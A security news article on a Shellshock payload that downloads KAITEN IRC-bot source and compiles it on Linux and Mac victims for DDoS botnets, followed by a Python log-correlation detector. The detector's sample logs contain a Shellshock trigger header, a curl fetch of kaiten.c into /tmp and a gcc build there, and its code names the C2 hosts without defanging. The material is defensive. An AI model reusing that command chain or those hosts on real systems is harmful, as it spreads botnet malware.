A Bash bug payload downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file.

Attackers have been leveraging Shellshock vulnerabilities to deliver malware since the issue was disclosed in late September, and now researchers with Trend Micro have observed a Bash bug payload – detected as TROJ_BASHKAI.SM – downloading the source code of KAITEN malware.

KAITEN is an older Internet Relay Chat (IRC)-controlled malware that is typically used to carry out distributed denial-of-service (DDoS) attacks, so spreading the infection can help the attackers bring down targeted organizations, according to a Sunday Trend Micro post.

“The purpose is to add compromised systems to botnets,” Christopher Budd, global threat communications manager with Trend Micro, told SCMagazine.com in a Monday email correspondence. “In this case these are botnets primarily focused on launching DDoS attacks.”

Getting KAITEN on the system – Linux/UNIX and Mac OS X systems are at risk, Budd said – is not a direct process.

TROJ_BASHKAI.SM connects to two URLs when executed, according to the post. The first URL downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file detected as ELF_KAITEN.SM.

Compiling on the victim ensures the malware runs properly because a binary downloaded directly would risk compatibility problems across different Linux distributions, the post indicates. Furthermore, delivering source code rather than a binary evades network security systems that only scan for executables.

ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net, joins the IRC channel #pwn, and awaits commands, according to the post. Supported commands include performing UDP, SYN and PUSH-ACK floods, downloading files, sending raw IRC commands, starting a remote shell, and disabling, enabling or terminating the client.

When TROJ_BASHKAI.SM connects to the second URL, KAITEN source code is downloaded and similarly compiled into ELF_KAITEN.A, which is essentially the same as ELF_KAITEN.SM except that it connects to linksys[dot]secureshellz[dot]net[colon]25 and to channel #shellshock, the post indicates.
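A defender-side correlation of the stages described above (a Shellshock request, a source fetch followed by a gcc compile in a scratch directory, and an IRC join to the named C2 channels), written as an added example that is not from the article or from Trend Micro. The log line format, the example.invalid URLs and the Shellshock trigger regex are assumptions; the C2 hosts and channels are the ones the article names.

```python
"""Correlate the Shellshock-to-KAITEN chain across constructed log lines."""
import re
from collections import defaultdict

SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")  # stage 1: trigger in a header
FETCH_RE = re.compile(r"\b(?:curl|wget)\b.*?https?://\S+")  # stage 2a: source fetch
COMPILE_RE = re.compile(r"\bgcc\b.*?(?:/tmp|/var/tmp|/dev/shm)/\S+\.c\b")  # 2b: build
C2_HOSTS = {"x.secureshellz.net", "linksys.secureshellz.net"}  # stage 3, from the article
C2_CHANNELS = {"#pwn", "#shellshock"}
IRC_JOIN_RE = re.compile(r"\bJOIN\s+(#\S+)", re.IGNORECASE)

def classify(msg):
    """Return the infection stage one log message evidences, or None."""
    if SHELLSHOCK_RE.search(msg):
        return "shellshock_request"
    if COMPILE_RE.search(msg):
        return "gcc_compile_in_tmp"
    if FETCH_RE.search(msg):
        return "source_fetch"
    m = IRC_JOIN_RE.search(msg)
    if m and m.group(1).lower() in C2_CHANNELS:
        return "irc_c2_channel"
    if any(h in msg.lower() for h in C2_HOSTS):
        return "irc_c2_host"
    return None

def correlate(lines):
    """Group distinct stage hits per host; each line is '<host> <message>'."""
    stages = defaultdict(set)
    for line in lines:
        host, _, msg = line.partition(" ")
        stage = classify(msg)
        if stage:
            stages[host].add(stage)
    return dict(stages)

def alerts(lines, min_stages=2):
    """Hosts showing at least min_stages distinct stages of the chain."""
    return sorted(h for h, s in correlate(lines).items() if len(s) >= min_stages)

# Constructed sample lines, not real telemetry: '<host> <source> <message>'.
SAMPLE_LOGS = [
    'web01 access 203.0.113.5 "GET /cgi-bin/status HTTP/1.1" ua="() { :;}; /bin/true"',
    'web01 audit uid=48 cmd="curl http://src.example.invalid/kaiten.c -o /tmp/kaiten.c"',
    'web01 audit uid=48 cmd="gcc -o /tmp/.kaiten /tmp/kaiten.c"',
    'web01 netflow dst=linksys.secureshellz.net:25 proto=tcp',
    'web01 irc JOIN #shellshock',
    'web02 audit uid=1000 cmd="gcc -o /home/dev/app /home/dev/app.c"',
    'web03 audit uid=0 cmd="curl https://mirror.example.invalid/patch.tar.gz -O"',
]
```

Requiring several distinct stages on one host keeps a developer's lone gcc run (web02) or an ordinary download (web03) from raising an alert, while web01, which shows the whole chain, is flagged.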